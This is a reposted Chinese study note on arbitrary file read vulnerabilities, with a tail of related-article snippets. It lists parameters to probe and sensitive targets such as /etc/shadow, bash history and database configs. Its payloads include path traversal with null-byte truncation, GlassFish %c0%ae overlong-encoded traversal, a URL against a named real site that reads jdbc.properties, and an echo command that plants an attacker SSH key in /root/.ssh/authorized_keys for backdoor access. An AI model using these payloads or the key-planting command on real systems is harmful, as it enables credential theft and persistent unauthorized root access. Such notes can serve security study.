2. 程式人生 > >烏雲漏洞筆記1-任意檔案讀取

烏雲漏洞筆記1-任意檔案讀取

阿新 發佈:2018-12-23

閱讀時間16.01.18
page1-3

敏感欄位

&RealPath=
&FilePath=
&filepath=
&Path=
&path=
&inputFile=
&url=
&urls=
&Lang=
&dis=
&data=
&readfile=
&filep=
&src=
&menu=
META-INF
WEB-INF

可利用路徑

/etc/shadow
/etc/passwd
/etc/hosts
/root/.bash_history

找user add,cd,mysql,ssh,nohop看敏感目錄和檔案等
/etc/syscomfig/network-scripts/ifcfg-eth1
sed -i ‘/95_251/d’ /root/.ssh/authorized_keys
url=file:///etc/passwd
(ssrf內網探測)
/opt/nginx/conf/nginx.conf
file:///,gopher://,ftp://
/configs/database.php

Payload

  1. http://...:8080/%c0%ae/WEB-INF/classes/com/huilan/application/action/PeopleBankAction.class

  2. 配合截斷規則:/etc/passwd%00.jpg

  3. ../../../../../../../../../../etc/passwd%00.jpg

  4. http://www.zzvcom.com/cms/interface.jsp?time=41&data={readfile:%27/WEB-INF/classes/jdbc.properties%27}&jsoncallback=jsonp1442909681355

  5. echo ssh-rsa
    AAAAB3NzaC1yc2EAAAABIwAAAQEA0jrJeJfEURdpG/jddXzk3zZYxQfdHbgPC4QYh5qx0F2SS1Q+uCW6j2cM/SxqhocfgDYw1CTikNTlJ43tzv1ozpSRjmLH26aTxGDUnXsvyVLeWdrjPni1FoVffW+LM0rZVh7A74Vi1bDr7IP7XjSMQU157rye7++G+eWA1NhscIiiJ/pwUKAjPSiEx+8DXN8ccTDyWrSnD+NfUQXPO4dVFu2MR5/VjLO2yWsVMwenCPwItf5xEwGqU5KbzxeTOyDnYYLk7UF6lBYpSDZC9U3mNL1alYgNnIbmZGYg921KFh28BRptDewh5MRDKmfMUSqeZpIZ95Pq8lG1sObcjNzDew==

    [email protected]_251.easou.com >> /root/.ssh/authorized_keys

相關推薦

烏雲漏洞筆記1-任意檔案讀取

閱讀時間16.01.18 page1-3 敏感欄位 &RealPath= &FilePath= &filepath= &Path= &

glassfish任意檔案讀取漏洞(4.0/4.1)

相關廠商:glassfish漏洞編號:wooyun-2010-0144595漏洞詳情:http://localhost:4848/theme/META-INF/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae%c0%ae/%c0%ae

【程式碼審計】Cscms_v4.1 任意檔案刪除漏洞例項

  環境搭建: CSCMS :http://www.chshcms.com/ 網站原始碼版本:Cscms_v4.1正式版(釋出日期:2017-06-05) 程式原始碼下載:https://github.com/chshcms/cscms   漏洞例項一: 漏洞檔案位

【程式碼審計】大米CMS_V5.5.3 任意檔案讀取漏洞分析

  0x00 環境準備 大米CMS官網:http://www.damicms.com 網站原始碼版本:大米CMS_V5.5.3試用版(更新時間:2017-04-15) 程式原始碼下載:http://www.damicms.com/downes/dami.rar 測試網站首頁:  

Weblogic漏洞之弱口令、任意檔案讀取、上傳shell

弱口令 環境啟動後,訪問http://192.168.1.15:7001/console/login/LoginForm.jsp,即為weblogic後臺。 本環境存在弱口令可以直接登入: weblogic [email protected]

24.Windows任意檔案讀取漏洞

漏洞概述: 近日,國外安全研究員SandboxEscaper又一次在推特上公佈了新的Windows 0 day漏洞細節及PoC。這是2018年8月開始該研究員公佈的第三個windows 0 day漏洞。此次披露的漏洞可造成任意檔案讀取。該漏洞可允許低許可權使用者或惡意程式讀取目標Windows主機上任意

WEB安全系列之如何挖掘任意檔案讀取漏洞

$fp="../template/".$siteskin."/area_show.htm"; $f = fopen($fp,'r'); $strout = fread($f,filesize($fp)); fclose($f); $strout=str_replace("{#siteskin}",$site

應用伺服器glassfish任意檔案讀取漏洞

事情就這樣默默發生了 在2015年的10月3日,一位路人甲同學在烏雲上釋出了一個名為“應用伺服器glassfish存在通用任意檔案讀取漏洞”的漏洞,大致內容如下: 漏洞作者:路人甲 相關廠商:glassfish 漏洞編號:wooyun-2010-0144595 漏洞

PHPMailer命令執行及任意檔案讀取漏洞

  今天在thinkphp官網閒逛,無意下載了一套eduaskcms,查看了一下libs目錄中居然存在PHPMailer-5.2.13,想起了之前看到的PHPMailer的漏洞,可惜這套CMS只提供了一個郵箱介面,前臺頁面需要單獨自己寫,沒辦法用這套CMS進行復現,這邊也順便

PhpMyadmin任意檔案讀取漏洞

  libraries/import/xml.php中 unset($data); /** * Load the XML string * * The option LIBXML_COMPACT is specified because it can

【程式碼審計】任意檔案讀取漏洞例項

0x00 前言   大多數網站都提供讀取檔案功能,一般實現過程是,根據引數filename的值,獲得該檔案在網站上的絕對路徑,讀取檔案。   這裡,通過兩個任意檔案讀取漏洞例項去展示漏洞原理、漏洞危害。 0x01 漏洞例項一 環境搭建: XYHCMS官網:http:

Windows任意檔案讀取漏洞

低許可權使用者或惡意程式能夠讀取目標Windows計算機上任何檔案的內容,設想你取得了一個普通許可權,還能幹嗎,用該漏洞作者SandboxEscaper的一句話來說,也許是密碼檔案,我不夠聰明,不知道能幹嗎。 漏洞故事 Twitter別名SandboxEscaper

Jenkins 任意檔案讀取漏洞分析

一、漏洞背景 漏洞編號:CVE-2018-1999002 漏洞等級:高危 Jenkins 7 月 18 日的安全通告修復了多個漏洞,其中 SECURITY-914 是由 Orange (部落格連結:http://blog.orange.tw/)挖出的 Jenkins 未授權任意檔案讀取漏

C# 好程式碼學習筆記(1):檔案操作、讀取檔案、Debug/Trace 類、Conditional條件編譯、CLS

[TOC] 目錄: 1,檔案操作 2,Debug、Trace類 3,條件編譯 4,MethodImpl 特性 5,CLSComplianAttribute 6,必要時自定義類型別名 最近在閱讀 .NET Core Runtime 的原始碼,參考大佬的程式碼,學習編寫技巧和提高程式碼水平。學

Apache Solr任意檔案讀取漏洞復現

​ Apache Solr任意檔案讀取漏洞復現 一、簡介 Solr是一個獨立的企業級搜尋應用伺服器,它對外提供類似於Web-service的API介面。使用者可以通過http請求,向搜尋引擎伺服器提交一定格式的XML檔案,生成索引;也可以通過Http Get操作提出查詢請求,並得到XML格式的返回結果。

cmake學習筆記1--單檔案編譯(霜之小刀)

cmake學習筆記1–單檔案編譯(霜之小刀) 歡迎轉載和引用,若有問題請聯絡 若有疑問,請聯絡 Email : [email protected] QQ:2279557541 本文參考了http://blog.csdn.net/piao

Panda學習筆記1——配置檔案

web.xml 配置contextConfigLocation 在web.xml中定義contextConfigLocation引數,Spring會使用這個引數去載入所有逗號分隔的xml檔案,如果沒有這個引數,Spring預設載入web-inf/applicat

python筆記1——關於檔案的開啟與讀寫

一、檔案的開啟與關閉1.open,close函式 #-*- coding:utf-8 -*- # 1、w 寫模式,它是不能讀的,如果用w模式開啟一個已經存在的檔案,會清空以前的檔案內容,重新寫 # w+ 是讀寫內容,只要沾上w,肯定會清空原來的檔案 # 2、r 讀模式,只能讀,不能寫,而且檔案

任意檔案讀取路徑、欄位和payload

敏感欄位 &RealPath= &FilePath= &filepath= &Path= &path= &inputFile= &url= &urls= &Lang= &dis= &da

利用glassfish4任意檔案讀取拿許可權的一些思路

只要討論的是linux環境測試發現只針對GlassFish4,且基本上是已root執行的http://www.wooyun.org/bugs/wooyun-2010-0144595 zoomeye dorkGlassFish Server Open Source Edition 4.1 放張圖 nosec